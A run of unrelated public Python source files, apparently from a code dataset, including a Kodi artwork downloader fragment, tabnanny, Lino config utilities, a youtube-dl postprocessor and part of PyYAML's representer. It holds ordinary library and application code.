log(' - Adding to download list (does not exist in all target directories): %s' % item['filename'])
download_list.append(item)
else:
imagefound = True
log(' - Ignoring (Exists in all target directories): %s' % item['filename'])
# Raise limit counter because image was added to list or it already existed
limit_counter += 1
# Check if artwork doesn't exist and the ones available are below settings even after searching for English fallback
if limited[0] and imageignore and i == 1:
for targetdir in item['targetdirs']:
if (not self.fileops._exists(os.path.join (targetdir,item['filename'])) and not
art_item['art_type'] in ['extrafanart', 'extrathumbs']):
failed_items.append('[%s] %s %s' % (currentmedia['name'], art_item['art_type'], __localize__(32147)))
# Do some special check on season artwork
if art_item['art_type'] == 'seasonlandscape' or art_item['art_type'] == 'seasonbanner' or art_item['art_type'] == 'seasonposter':
# If already present in list set limit on 1 so it is skipped
limit_counter = 0
if artwork['season'] in seasonfile_presents:
log('seasonnumber: %s' %artwork['season'])
limit_counter = 1
# If not present in list but found image add it to list and reset counter limit
elif imagefound:
seasonfile_presents.append(artwork['season'])
log('Seasons present: %s' %seasonfile_presents)
# if not found and not already in list set limit to zero and image found false
else:
imagefound = False
# Counter to make the loop twice when nothing found
i += 1
# Not loop when preferred language is English because that the same as the backup
if pref_language == 'en':
i += 2
# Add to failed items if 0
if current_artwork == 0:
failed_items.append('[%s] %s %s' % (currentmedia['name'], art_item['art_type'], __localize__(32022)))
# Print log message number of found images per art type
log(' - Found a total of: %s %s' % (current_artwork, art_item['art_type']))
# End of language shit
def _batch_download(self, image_list):
log('########################################################')
global download_counter
global download_succes
global reportdata
image_list_total = len(image_list)
if not image_list_total == 0:
failcount = 0
for item in image_list:
if xbmc.abortRequested:
reportdata += ('\n - %s: %s' %(__localize__(32150), time.strftime('%d %B %Y - %H:%M')))
break
if dialog_msg('iscanceled',
background = setting['background']):
reportdata += ('\n - %s: %s' %(__localize__(32153), time.strftime('%d %B %Y - %H:%M')))
break
dialog_msg('update',
percentage = int(float(download_counter['Total Artwork']) / float(image_list_total) * 100.0),
line1 = item['media_name'],
line2 = __localize__(32009) + ' ' + __localize__(item['artwork_string']),
line3 = item['filename'], background = setting['background'])
# Try downloading the file and catch errors while trying to
try:
if setting['files_local'] and not item['art_type'] in ['extrafanart', 'extrathumbs']:
if ((not self.fileops._exists(item['localfilename']) or
startup['mode'] == 'customgui' or
startup['mode'] == 'gui') and
item['url'].startswith('http')):
self.fileops._downloadfile(item)
item['url'] = item['localfilename'].replace('\\','\\\\')
if item['art_type'] in ['extrathumbs', 'extrafanart']:
self.fileops._downloadfile(item)
elif item['mediatype'] == 'movie':
xbmc.executeJSONRPC('{"jsonrpc": "2.0", "method": "VideoLibrary.SetMovieDetails", "params": { "movieid": %i, "art": { "%s": "%s" }}, "id": 1 }' %(item['dbid'], item['art_type'], item['url']))
elif item['mediatype'] == 'tvshow':
xbmc.executeJSONRPC('{"jsonrpc": "2.0", "method": "VideoLibrary.SetTVShowDetails", "params": { "tvshowid": %i, "art": { "%s": "%s" }}, "id": 1 }' %(item['dbid'], item['art_type'], item['url']))
except HTTP404Error, e:
log('URL not found: %s' % str(e), xbmc.LOGERROR)
download_succes = False
except HTTPTimeout, e:
failcount += 1
log('Download timed out: %s' % str(e), xbmc.LOGERROR)
download_succes = False
except CreateDirectoryError, e:
log('Could not create directory, skipping: %s' % str(e), xbmc.LOGWARNING)
download_succes = False
except CopyError, e:
log('Could not copy file (Destination may be read only), skipping: %s' % str(e), xbmc.LOGWARNING)
download_succes = False
except DownloadError, e:
failcount += 1
log('Error downloading file: %s (Possible network error: %s), skipping' % (item['url'], str(e)), xbmc.LOGERROR)
download_succes = False
else:
try:
download_counter[__localize__(item['artwork_string'])] += 1
except KeyError:
download_counter[__localize__(item['artwork_string'])] = 1
download_counter['Total Artwork'] += 1
download_succes = True
log('Finished download')
### This handles the GUI image type selector part
def _gui_mode(self, currentmedia):
global download_arttypes
global image_list
# Close the 'checking for artwork' dialog before opening the GUI list
dialog_msg('close',
background = setting['background'])
# Look for argument matching artwork types
for item in sys.argv:
for type in arttype_list:
if item == type['art_type'] and startup['mediatype'] == type['media_type']:
log('- Custom %s mode art_type: %s' %(type['media_type'],type['art_type']))
download_arttypes.append(item)
gui_selected_type = False
# If only one specified and not extrafanart/extrathumbs
if ((len(download_arttypes) == 1) and
startup['dbid'] and not
'extrathumbs' in download_arttypes and not
'extrafanart' in download_arttypes):
imagelist = False
for gui_arttype in download_arttypes:
gui_selected_type = gui_arttype
break
# Add parse the image restraints
if gui_selected_type:
for arttype in arttype_list:
if gui_selected_type == arttype['art_type'] and startup['mediatype'] == arttype['media_type']:
# Get image list for that specific imagetype
imagelist = gui_imagelist(image_list, gui_selected_type)
# Some debug log output
for image in imagelist:
log('- Image put to GUI: %s' %image)
break
else:
# Create empty list and set bool to false that there is a list
enabled_type_list = []
imagelist = False
# Fill GUI art type list
for arttype in arttype_list:
if (arttype['solo_enabled'] == 'true' and
startup['mediatype'] == arttype['media_type'] and
hasimages(image_list, arttype['art_type'])):
gui = __localize__(arttype['gui_string'])
enabled_type_list.append(gui)
# Not sure what this does again
if len(enabled_type_list) == 1:
enabled_type_list[0] = 'True'
# Fills imagelist with image that fit the selected imagetype
type_list = choice_type(enabled_type_list, startup, arttype_list)
if (len(enabled_type_list) == 1) or type_list:
imagelist = gui_imagelist(image_list, type_list['art_type'])
# Some debug log output
for image in imagelist:
log('- Image put to GUI: %s' %image)
# Download the selected image
# If there's a list, send the imagelist to the selection dialog
if imagelist:
image_list = choose_image(imagelist)
if image_list:
# Create a progress dialog so you can see the progress,
#Send the selected image for processing, Initiate the batch download
dialog_msg('create')
for art_type in arttype_list:
if image_list['art_type'][0] == art_type['art_type']:
self._download_art(currentmedia, art_type, currentmedia['artworkdir'])
self._batch_download(download_list)
break
# When not succesfull show failure dialog
if not download_succes:
dialog_msg('okdialog',
line1 = __localize__(32006),
line2 = __localize__(32007))
# When no images found or nothing selected
if not imagelist and gui_selected_type:
log('- No artwork found')
dialog_msg('okdialog',
line1 = currentmedia['name'],
line2 = __localize__(arttype['gui_string']) + ' ' + __localize__(32022))
# When download succesfull
elif download_succes:
log('- Download succesfull')
# Selection was cancelled
else:
global cancelled
cancelled = True
def _custom_mode(self, currentmedia):
global download_arttypes
global image_list
global startup
# Look for argument matching artwork types
for item in sys.argv:
for type in arttype_list:
if item == type['art_type'] and startup['mediatype'] == type['media_type']:
log('- Custom %s mode art_type: %s' %(type['media_type'],type['art_type']))
download_arttypes.append(item)
# If only one specified and not extrafanart/extrathumbs
if ((len(download_arttypes) == 1) and
startup['dbid'] and not
'extrathumbs' in download_arttypes and not
'extrafanart' in download_arttypes):
# Get image list for that specific imagetype
for gui_arttype in download_arttypes:
imagelist = gui_imagelist(image_list, gui_arttype)
log('- Number of images: %s' %len(imagelist))
# If more images than 1 found show GUI selection
if len(imagelist) > 1:
dialog_msg('close',
background = setting['background'])
startup['mode'] = 'customgui'
log('- Image list larger than 1')
image_list = choose_image(imagelist)
if image_list:
log('- Chosen: %s'% image_list)
dialog_msg('create')
for item in arttype_list:
if gui_arttype == item['art_type']:
self._download_art(currentmedia,
item,
currentmedia['artworkdir'])
break
self._batch_download(download_list)
if not download_succes:
dialog_msg('okdialog',
line1 = __localize__(32006),
line2 = __localize__(32007))
if download_succes:
log('- Download succesfull')
else:
log('- Cancelled')
global cancelled
cancelled = True
else:
self._download_process(currentmedia)
log('- More than 1 image available')
# If more than one specified
else:
log('- Start custom bulkmode')
self._download_process(currentmedia)
### Start of script
if (__name__ == '__main__'):
log('######## Artwork Downloader: Initializing...............................', xbmc.LOGNOTICE)
log('## Add-on Name = %s' % str(__addonname__), xbmc.LOGNOTICE)
log('## Version = %s' % str(__version__), xbmc.LOGNOTICE)
Main()
log('script stopped', xbmc.LOGNOTICE)
|
ybellavance/python-for-android
|
refs/heads/master
|
python3-alpha/python3-src/Lib/tabnanny.py
|
47
|
#! /usr/bin/env python3
"""The Tab Nanny despises ambiguous indentation. She knows no mercy.
tabnanny -- Detection of ambiguous indentation
For the time being this module is intended to be called as a script.
However it is possible to import it into an IDE and use the function
check() described below.
Warning: The API provided by this module is likely to change in future
releases; such changes may not be backward compatible.
"""
# Released to the public domain, by Tim Peters, 15 April 1998.
# XXX Note: this is now a standard library module.
# XXX The API needs to undergo changes however; the current code is too
# XXX script-like. This will be addressed later.
__version__ = "6"
import os
import sys
import getopt
import tokenize
if not hasattr(tokenize, 'NL'):
raise ValueError("tokenize.NL doesn't exist -- tokenize module too old")
__all__ = ["check", "NannyNag", "process_tokens"]
verbose = 0
filename_only = 0
def errprint(*args):
sep = ""
for arg in args:
sys.stderr.write(sep + str(arg))
sep = " "
sys.stderr.write("\n")
def main():
global verbose, filename_only
try:
opts, args = getopt.getopt(sys.argv[1:], "qv")
except getopt.error as msg:
errprint(msg)
return
for o, a in opts:
if o == '-q':
filename_only = filename_only + 1
if o == '-v':
verbose = verbose + 1
if not args:
errprint("Usage:", sys.argv[0], "[-v] file_or_directory ...")
return
for arg in args:
check(arg)
class NannyNag(Exception):
"""
Raised by tokeneater() if detecting an ambiguous indent.
Captured and handled in check().
"""
def __init__(self, lineno, msg, line):
self.lineno, self.msg, self.line = lineno, msg, line
def get_lineno(self):
return self.lineno
def get_msg(self):
return self.msg
def get_line(self):
return self.line
def check(file):
"""check(file_or_dir)
If file_or_dir is a directory and not a symbolic link, then recursively
descend the directory tree named by file_or_dir, checking all .py files
along the way. If file_or_dir is an ordinary Python source file, it is
checked for whitespace related problems. The diagnostic messages are
written to standard output using the print statement.
"""
if os.path.isdir(file) and not os.path.islink(file):
if verbose:
print("%r: listing directory" % (file,))
names = os.listdir(file)
for name in names:
fullname = os.path.join(file, name)
if (os.path.isdir(fullname) and
not os.path.islink(fullname) or
os.path.normcase(name[-3:]) == ".py"):
check(fullname)
return
try:
f = tokenize.open(file)
except IOError as msg:
errprint("%r: I/O Error: %s" % (file, msg))
return
if verbose > 1:
print("checking %r ..." % file)
try:
process_tokens(tokenize.generate_tokens(f.readline))
except tokenize.TokenError as msg:
errprint("%r: Token Error: %s" % (file, msg))
return
except IndentationError as msg:
errprint("%r: Indentation Error: %s" % (file, msg))
return
except NannyNag as nag:
badline = nag.get_lineno()
line = nag.get_line()
if verbose:
print("%r: *** Line %d: trouble in tab city! ***" % (file, badline))
print("offending line: %r" % (line,))
print(nag.get_msg())
else:
if ' ' in file: file = '"' + file + '"'
if filename_only: print(file)
else: print(file, badline, repr(line))
return
if verbose:
print("%r: Clean bill of health." % (file,))
class Whitespace:
# the characters used for space and tab
S, T = ' \t'
# members:
# raw
# the original string
# n
# the number of leading whitespace characters in raw
# nt
# the number of tabs in raw[:n]
# norm
# the normal form as a pair (count, trailing), where:
# count
# a tuple such that raw[:n] contains count[i]
# instances of S * i + T
# trailing
# the number of trailing spaces in raw[:n]
# It's A Theorem that m.indent_level(t) ==
# n.indent_level(t) for all t >= 1 iff m.norm == n.norm.
# is_simple
# true iff raw[:n] is of the form (T*)(S*)
def __init__(self, ws):
self.raw = ws
S, T = Whitespace.S, Whitespace.T
count = []
b = n = nt = 0
for ch in self.raw:
if ch == S:
n = n + 1
b = b + 1
elif ch == T:
n = n + 1
nt = nt + 1
if b >= len(count):
count = count + [0] * (b - len(count) + 1)
count[b] = count[b] + 1
b = 0
else:
break
self.n = n
self.nt = nt
self.norm = tuple(count), b
self.is_simple = len(count) <= 1
# return length of longest contiguous run of spaces (whether or not
# preceding a tab)
def longest_run_of_spaces(self):
count, trailing = self.norm
return max(len(count)-1, trailing)
def indent_level(self, tabsize):
# count, il = self.norm
# for i in range(len(count)):
# if count[i]:
# il = il + (i/tabsize + 1)*tabsize * count[i]
# return il
# quicker:
# il = trailing + sum (i/ts + 1)*ts*count[i] =
# trailing + ts * sum (i/ts + 1)*count[i] =
# trailing + ts * sum i/ts*count[i] + count[i] =
# trailing + ts * [(sum i/ts*count[i]) + (sum count[i])] =
# trailing + ts * [(sum i/ts*count[i]) + num_tabs]
# and note that i/ts*count[i] is 0 when i < ts
count, trailing = self.norm
il = 0
for i in range(tabsize, len(count)):
il = il + i/tabsize * count[i]
return trailing + tabsize * (il + self.nt)
# return true iff self.indent_level(t) == other.indent_level(t)
# for all t >= 1
def equal(self, other):
return self.norm == other.norm
# return a list of tuples (ts, i1, i2) such that
# i1 == self.indent_level(ts) != other.indent_level(ts) == i2.
# Intended to be used after not self.equal(other) is known, in which
# case it will return at least one witnessing tab size.
def not_equal_witness(self, other):
n = max(self.longest_run_of_spaces(),
other.longest_run_of_spaces()) + 1
a = []
for ts in range(1, n+1):
if self.indent_level(ts) != other.indent_level(ts):
a.append( (ts,
self.indent_level(ts),
other.indent_level(ts)) )
return a
# Return True iff self.indent_level(t) < other.indent_level(t)
# for all t >= 1.
# The algorithm is due to Vincent Broman.
# Easy to prove it's correct.
# XXXpost that.
# Trivial to prove n is sharp (consider T vs ST).
# Unknown whether there's a faster general way. I suspected so at
# first, but no longer.
# For the special (but common!) case where M and N are both of the
# form (T*)(S*), M.less(N) iff M.len() < N.len() and
# M.num_tabs() <= N.num_tabs(). Proof is easy but kinda long-winded.
# XXXwrite that up.
# Note that M is of the form (T*)(S*) iff len(M.norm[0]) <= 1.
def less(self, other):
if self.n >= other.n:
return False
if self.is_simple and other.is_simple:
return self.nt <= other.nt
n = max(self.longest_run_of_spaces(),
other.longest_run_of_spaces()) + 1
# the self.n >= other.n test already did it for ts=1
for ts in range(2, n+1):
if self.indent_level(ts) >= other.indent_level(ts):
return False
return True
# return a list of tuples (ts, i1, i2) such that
# i1 == self.indent_level(ts) >= other.indent_level(ts) == i2.
# Intended to be used after not self.less(other) is known, in which
# case it will return at least one witnessing tab size.
def not_less_witness(self, other):
n = max(self.longest_run_of_spaces(),
other.longest_run_of_spaces()) + 1
a = []
for ts in range(1, n+1):
if self.indent_level(ts) >= other.indent_level(ts):
a.append( (ts,
self.indent_level(ts),
other.indent_level(ts)) )
return a
def format_witnesses(w):
firsts = (str(tup[0]) for tup in w)
prefix = "at tab size"
if len(w) > 1:
prefix = prefix + "s"
return prefix + " " + ', '.join(firsts)
def process_tokens(tokens):
INDENT = tokenize.INDENT
DEDENT = tokenize.DEDENT
NEWLINE = tokenize.NEWLINE
JUNK = tokenize.COMMENT, tokenize.NL
indents = [Whitespace("")]
check_equal = 0
for (type, token, start, end, line) in tokens:
if type == NEWLINE:
# a program statement, or ENDMARKER, will eventually follow,
# after some (possibly empty) run of tokens of the form
# (NL | COMMENT)* (INDENT | DEDENT+)?
# If an INDENT appears, setting check_equal is wrong, and will
# be undone when we see the INDENT.
check_equal = 1
elif type == INDENT:
check_equal = 0
thisguy = Whitespace(token)
if not indents[-1].less(thisguy):
witness = indents[-1].not_less_witness(thisguy)
msg = "indent not greater e.g. " + format_witnesses(witness)
raise NannyNag(start[0], msg, line)
indents.append(thisguy)
elif type == DEDENT:
# there's nothing we need to check here! what's important is
# that when the run of DEDENTs ends, the indentation of the
# program statement (or ENDMARKER) that triggered the run is
# equal to what's left at the top of the indents stack
# Ouch! This assert triggers if the last line of the source
# is indented *and* lacks a newline -- then DEDENTs pop out
# of thin air.
# assert check_equal # else no earlier NEWLINE, or an earlier INDENT
check_equal = 1
del indents[-1]
elif check_equal and type not in JUNK:
# this is the first "real token" following a NEWLINE, so it
# must be the first token of the next program statement, or an
# ENDMARKER; the "line" argument exposes the leading whitespace
# for this statement; in the case of ENDMARKER, line is an empty
# string, so will properly match the empty string with which the
# "indents" stack was seeded
check_equal = 0
thisguy = Whitespace(line)
if not indents[-1].equal(thisguy):
witness = indents[-1].not_equal_witness(thisguy)
msg = "indent not equal e.g. " + format_witnesses(witness)
raise NannyNag(start[0], msg, line)
if __name__ == '__main__':
main()
|
tom-heimbrodt/oeplatform
|
refs/heads/develop
|
dataedit/metadata/error.py
|
1
|
class MetadataException(Exception):
def __init__(self, metadata, error):
self.metadata = metadata
self.error = error
|
romankagan/DDBWorkbench
|
refs/heads/master
|
plugins/hg4idea/testData/bin/mercurial/lsprofcalltree.py
|
100
|
"""
lsprofcalltree.py - lsprof output which is readable by kcachegrind
Authors:
* David Allouche <david <at> allouche.net>
* Jp Calderone & Itamar Shtull-Trauring
* Johan Dahlin
This software may be used and distributed according to the terms
of the GNU General Public License, incorporated herein by reference.
"""
def label(code):
if isinstance(code, str):
return '~' + code # built-in functions ('~' sorts at the end)
else:
return '%s %s:%d' % (code.co_name,
code.co_filename,
code.co_firstlineno)
class KCacheGrind(object):
def __init__(self, profiler):
self.data = profiler.getstats()
self.out_file = None
def output(self, out_file):
self.out_file = out_file
print >> out_file, 'events: Ticks'
self._print_summary()
for entry in self.data:
self._entry(entry)
def _print_summary(self):
max_cost = 0
for entry in self.data:
totaltime = int(entry.totaltime * 1000)
max_cost = max(max_cost, totaltime)
print >> self.out_file, 'summary: %d' % (max_cost,)
def _entry(self, entry):
out_file = self.out_file
code = entry.code
#print >> out_file, 'ob=%s' % (code.co_filename,)
if isinstance(code, str):
print >> out_file, 'fi=~'
else:
print >> out_file, 'fi=%s' % (code.co_filename,)
print >> out_file, 'fn=%s' % (label(code),)
inlinetime = int(entry.inlinetime * 1000)
if isinstance(code, str):
print >> out_file, '0 ', inlinetime
else:
print >> out_file, '%d %d' % (code.co_firstlineno, inlinetime)
# recursive calls are counted in entry.calls
if entry.calls:
calls = entry.calls
else:
calls = []
if isinstance(code, str):
lineno = 0
else:
lineno = code.co_firstlineno
for subentry in calls:
self._subentry(lineno, subentry)
print >> out_file
def _subentry(self, lineno, subentry):
out_file = self.out_file
code = subentry.code
#print >> out_file, 'cob=%s' % (code.co_filename,)
print >> out_file, 'cfn=%s' % (label(code),)
if isinstance(code, str):
print >> out_file, 'cfi=~'
print >> out_file, 'calls=%d 0' % (subentry.callcount,)
else:
print >> out_file, 'cfi=%s' % (code.co_filename,)
print >> out_file, 'calls=%d %d' % (
subentry.callcount, code.co_firstlineno)
totaltime = int(subentry.totaltime * 1000)
print >> out_file, '%d %d' % (lineno, totaltime)
|
khchine5/lino
|
refs/heads/master
|
lino/utils/config.py
|
1
|
# -*- coding: UTF-8 -*-
# Copyright 2009-2017 Luc Saffre
# License: BSD (see file COPYING for details)
"""This defines the :class:`ConfigDirCache` which Lino instantiates
and installs as :attr:`SITE.confdirs
<lino.core.site.Site.confdirs>`.
It creates a list `config_dirs` of all configuration directories by
looping through :attr:`lino.core.site.Site.installed_plugins` and taking those
whose source directory has a :xfile:`config` subdir.
The mechanism in this module emulates the behaviour of Django's and
Jinja's template loaders.
We cannot use the Jinja loader because Jinja's `get_template` method
returns a `Template`, and Jinja templates don't know their filename.
One possibility might be to write a special Jinja Template class...
"""
from __future__ import unicode_literals
from builtins import object
import logging
logger = logging.getLogger(__name__)
import os
from os.path import join, abspath, dirname, isdir
import sys
import codecs
from fnmatch import fnmatch
import six
fs_encoding = sys.getfilesystemencoding() or sys.getdefaultencoding()
from lino.utils import iif
SUBDIR_NAME = 'config' # we might change this to "templates"
class ConfigDir(object):
"""A directory that may contain configuration files.
"""
def __init__(self, name, writeable):
self.name = abspath(name)
self.writeable = writeable
def __repr__(self):
return "ConfigDir %s" % self.name + iif(
self.writeable, " (writeable)", "")
class ConfigDirCache(object):
_init = False
def __init__(self, site):
if self._init:
raise Exception("Oops, ConfigDirCache was already instantiated!")
self._init = True
self.site = site
self.scan_config_dirs()
def scan_config_dirs(self):
"""Scan the file system and populate :attr:`config_dirs`."""
config_dirs = []
for pth in self.site.get_settings_subdirs(SUBDIR_NAME):
if six.PY2:
pth = pth.decode(fs_encoding)
config_dirs.append(ConfigDir(pth, False))
def add_config_dir(name, mod):
pth = join(dirname(mod.__file__), SUBDIR_NAME)
if isdir(pth):
# logger.info("add_config_dir %s %s", name, pth)
# config_dirs.append(ConfigDir(pth.decode(fs_encoding), False))
config_dirs.append(ConfigDir(pth, False))
self.site.for_each_app(add_config_dir)
self.LOCAL_CONFIG_DIR = None
p = self.site.cache_dir.child(SUBDIR_NAME)
if isdir(p):
self.LOCAL_CONFIG_DIR = ConfigDir(p, True)
config_dirs.append(self.LOCAL_CONFIG_DIR)
config_dirs.reverse()
self.config_dirs = tuple(config_dirs)
# logger.info('config_dirs:\n%s', '\n'.join([
# repr(cd) for cd in config_dirs]))
def find_config_file(self, fn, *groups):
"""
Return the full path of the first occurence within the
:class:`lino.utils.config.ConfigDirCache` of a file named
`filename`
"""
if os.path.isabs(fn):
return fn
if len(groups) == 0:
groups = ['']
for group in groups:
if group:
prefix = join(*(group.split('/')))
else:
prefix = ''
for cd in self.config_dirs:
ffn = join(cd.name, prefix, fn)
if os.path.exists(ffn):
return ffn
def find_config_files(self, pattern, *groups):
"""
Returns a dict of `filename` -> `config_dir` entries for each config
file on this site that matches the pattern. Loops through
`config_dirs` and collects matching files. When a filename is
provided by more than one app, then the latest app gets it.
`groups` is a tuple of strings, e.g. '', 'foo', 'foo/bar', ...
"""
files = {}
for group in groups:
if group:
prefix = os.path.sep + join(*(group.split('/')))
else:
prefix = ''
for cd in self.config_dirs:
pth = cd.name + prefix
if isdir(pth):
for fn in os.listdir(pth):
if fnmatch(fn, pattern):
files.setdefault(fn, cd)
return files
def find_template_config_files(self, template_ext, *groups):
"""
Like :func:`find_config_files`, but ignore babel variants:
e.g. ignore "foo_fr.html" if "foo.html" exists.
Note: but don't ignore "my_template.html"
"""
files = self.find_config_files('*' + template_ext, *groups)
l = []
template_ext
for name in list(files.keys()):
basename = name[:-len(template_ext)]
chunks = basename.split('_')
if len(chunks) > 1:
basename = '_'.join(chunks[:-1])
if basename + template_ext in files:
continue
l.append(name)
l.sort()
if not l:
logger.warning(
"find_template_config_files() : no matches for (%r, %r)",
'*' + template_ext, groups)
return l
def load_config_files(self, loader, pattern, *groups):
"""
Currently not used.
Naming conventions for :xfile:`*.dtl` files are:
- the first detail is called appname.Model.dtl
- If there are more Details, then they are called
appname.Model.2.dtl, appname.Model.3.dtl etc.
The `sort()` below must remove the filename extension (".dtl")
because otherwise the frist Detail would come last.
"""
files = list(self.find_config_files(pattern, *groups).items())
def fcmp(a):
return a[0][:-4]
files.sort(key=fcmp)
for group in groups:
prefix = group.replace("/", os.sep)
for filename, cd in files:
filename = join(prefix, filename)
ffn = join(cd.name, filename)
logger.debug("Loading %s...", ffn)
s = codecs.open(ffn, encoding='utf-8').read()
loader(s, cd, filename)
IGNORE_TIMES = False
MODIFY_WINDOW = 2
def must_make(src, target):
"returns True if src is newer than target"
try:
src_st = os.stat(src)
src_mt = src_st.st_mtime
except OSError:
# self.error("os.stat() failed: ",e)
return False
try:
target_st = os.stat(target)
target_mt = target_st.st_mtime
except OSError:
# self.error("os.stat() failed: %s", e)
return True
if src_mt - target_mt > MODIFY_WINDOW:
return True
return False
def make_dummy_messages_file(src_fn, messages):
"""
Write a dummy `.py` source file containing
translatable messages that getmessages will find.
"""
raise Exception("Never used")
target_fn = src_fn + '.py'
if not must_make(src_fn, target_fn):
logger.debug("%s is up-to-date.", target_fn)
return
try:
f = file(target_fn, 'w')
except IOError as e:
logger.warning("Could not write file %s : %s", target_fn, e)
return
f.write("# this file is generated by Lino\n")
f.write("from django.utils.translation import ugettext\n")
for m in messages:
f.write("ugettext(%r)\n" % m)
f.close()
logger.info("Wrote %d dummy messages to %s.", len(messages), target_fn)
|
riteshshrv/django
|
refs/heads/master
|
django/contrib/sessions/exceptions.py
|
931
|
from django.core.exceptions import SuspiciousOperation
class InvalidSessionKey(SuspiciousOperation):
"""Invalid characters in session key"""
pass
class SuspiciousSession(SuspiciousOperation):
"""The session may be tampered with"""
pass
|
j5shi/Thruster
|
refs/heads/master
|
pylibs/test/test_xml_etree_c.py
|
12
|
# xml.etree test for cElementTree
from test import test_support
from test.test_support import precisionbigmemtest, _2G
import unittest
cET = test_support.import_module('xml.etree.cElementTree')
# cElementTree specific tests
def sanity():
"""
Import sanity.
>>> from xml.etree import cElementTree
"""
class MiscTests(unittest.TestCase):
# Issue #8651.
@precisionbigmemtest(size=_2G + 100, memuse=1)
def test_length_overflow(self, size):
if size < _2G + 100:
self.skipTest("not enough free memory, need at least 2 GB")
data = b'x' * size
parser = cET.XMLParser()
try:
self.assertRaises(OverflowError, parser.feed, data)
finally:
data = None
def test_main():
from test import test_xml_etree, test_xml_etree_c
# Run the tests specific to the C implementation
test_support.run_doctest(test_xml_etree_c, verbosity=True)
# Assign the C implementation before running the doctests
# Patch the __name__, to prevent confusion with the pure Python test
pyET = test_xml_etree.ET
py__name__ = test_xml_etree.__name__
test_xml_etree.ET = cET
if __name__ != '__main__':
test_xml_etree.__name__ = __name__
try:
# Run the same test suite as xml.etree.ElementTree
test_xml_etree.test_main(module_name='xml.etree.cElementTree')
finally:
test_xml_etree.ET = pyET
test_xml_etree.__name__ = py__name__
if __name__ == '__main__':
test_main()
|
realriot/KinderThek.bundle
|
refs/heads/master
|
Contents/Code/mod_helper.py
|
1
|
debug = True
def getURL(url):
if debug == True: Log("Fetching content from url: " + url)
try:
content = HTTP.Request(url, cacheTime = CACHE_1HOUR).content
except Exception as e:
if debug == True: Log(str(e))
return content
|
rlsharpton/Introduction-Programming-Python
|
refs/heads/master
|
Solutions/Module7TaxesChallengeSolution.py
|
19
|
#Declare and initialize your variables
country = ""
province = ""
orderTotal = 0
totalWithTax = 0
#I am declaring variables to hold the tax values used in the calculations
#That way if a tax rate changes, I only have to change it in one place instead
#of searching through my code to see where I had a specific numeric value and updating it
GST = .05
HST = .13
PST = .06
#Ask the user what country they are from
country = input("What country are you from? " )
#if they are from Canada ask which province...don't forget they may enter Canada as CANADA, Canada, canada, CAnada
#so convert the string to lowercase before you do the comparison
if country.lower() == "canada" :
province = input("Which province are you from? ")
#ask for the order total
orderTotal = float(input("What is your order total? "))
#Now add the taxes
#first check if they are from canada
if country.lower() == "canada" :
#if they are from canada, we have to change the calculation based on the province they specified
if province.lower() == "alberta" :
orderTotal = orderTotal + orderTotal * GST
elif province.lower() == "ontario" or province.lower() == "new brunswick" or province.lower() == "nova scotia" :
orderTotal = orderTotal + orderTotal * HST
else :
orderTotal = orderTotal + orderTotal * PST + orderTotal * GST
#if they are not from Canada there is no tax, so the amount they entered is the total with tax
#and no modification to orderTotal is required
#Now display the total with taxes to the user, don't forget to format the number
print("Your total including taxes comes to $%.2f " % orderTotal)
|
hickford/youtube-dl
|
refs/heads/master
|
youtube_dl/postprocessor/execafterdownload.py
|
115
|
from __future__ import unicode_literals
import subprocess
from .common import PostProcessor
from ..compat import shlex_quote
from ..utils import PostProcessingError
class ExecAfterDownloadPP(PostProcessor):
def __init__(self, downloader, exec_cmd):
super(ExecAfterDownloadPP, self).__init__(downloader)
self.exec_cmd = exec_cmd
def run(self, information):
cmd = self.exec_cmd
if '{}' not in cmd:
cmd += ' {}'
cmd = cmd.replace('{}', shlex_quote(information['filepath']))
self._downloader.to_screen("[exec] Executing command: %s" % cmd)
retCode = subprocess.call(cmd, shell=True)
if retCode != 0:
raise PostProcessingError(
'Command returned error code %d' % retCode)
return [], information
|
nsharma283/PCF-php-buildpack
|
refs/heads/master
|
lib/yaml/representer.py
|
360
|
__all__ = ['BaseRepresenter', 'SafeRepresenter', 'Representer',
'RepresenterError']
from error import *
from nodes import *
import datetime
import sys, copy_reg, types
class RepresenterError(YAMLError):
pass
class BaseRepresenter(object):
yaml_representers = {}
yaml_multi_representers = {}
def __init__(self, default_style=None, default_flow_style=None):
self.default_style = default_style
self.default_flow_style = default_flow_style
self.represented_objects = {}
self.object_keeper = []
self.alias_key = None
def represent(self, data):
node = self.represent_data(data)
self.serialize(node)
self.represented_objects = {}
self.object_keeper = []
self.alias_key = None
def get_classobj_bases(self, cls):
bases = [cls]
for base in cls.__bases__:
bases.extend(self.get_classobj_bases(base))
return bases
def represent_data(self, data):
if self.ignore_aliases(data):
self.alias_key = None
else:
self.alias_key = id(data)
if self.alias_key is not None:
if self.alias_key in self.represented_objects:
node = self.represented_objects[self.alias_key]
#if node is None:
# raise RepresenterError("recursive objects are not allowed: %r" % data)
return node
#self.represented_objects[alias_key] = None
self.object_keeper.append(data)
data_types = type(data).__mro__
if type(data) is types.InstanceType:
data_types = self.get_classobj_bases(data.__class__)+list(data_types)
if data_types[0] in self.yaml_representers:
node = self.yaml_representers[data_types[0]](self, data)
else:
for data_type in data_types:
if data_type in self.yaml_multi_representers:
node = self.yaml_multi_representers[data_type](self, data)
break
else:
if None in self.yaml_multi_representers:
node = self.yaml_multi_representers[None](self, data)
elif None in self.yaml_representers:
node = self.yaml_representers[None](self, data)
else:
node = ScalarNode(None, unicode(data))
#if alias_key is not None:
# self.represented_objects[alias_key] = node
return node
def add_representer(cls, data_type, representer):
if not 'yaml_representers' in cls.__dict__:
cls.yaml_representers = cls.yaml_representers.copy()
cls.yaml_representers[data_type] = representer
add_representer = classmethod(add_representer)
def add_multi_representer(cls, data_type, representer):
if not 'yaml_multi_representers' in cls.__dict__:
cls.yaml_multi_representers = cls.yaml_multi_representers.copy()
cls.yaml_multi_representers[data_type] = representer
add_multi_representer = classmethod(add_multi_representer)
def represent_scalar(self, tag, value, style=None):
if style is None:
style = self.default_style
node = ScalarNode(tag, value, style=style)
if self.alias_key is not None:
self.represented_objects[self.alias_key] = node
return node
def represent_sequence(self, tag, sequence, flow_style=None):
value = []
node = SequenceNode(tag, value, flow_style=flow_style)
if self.alias_key is not None:
self.represented_objects[self.alias_key] = node
best_style = True
for item in sequence:
node_item = self.represent_data(item)
if not (isinstance(node_item, ScalarNode) and not node_item.style):
best_style = False
value.append(node_item)
if flow_style is None:
if self.default_flow_style is not None:
node.flow_style = self.default_flow_style
else:
node.flow_style = best_style
return node
def represent_mapping(self, tag, mapping, flow_style=None):
value = []
node = MappingNode(tag, value, flow_style=flow_style)
if self.alias_key is not None:
self.represented_objects[self.alias_key] = node
best_style = True
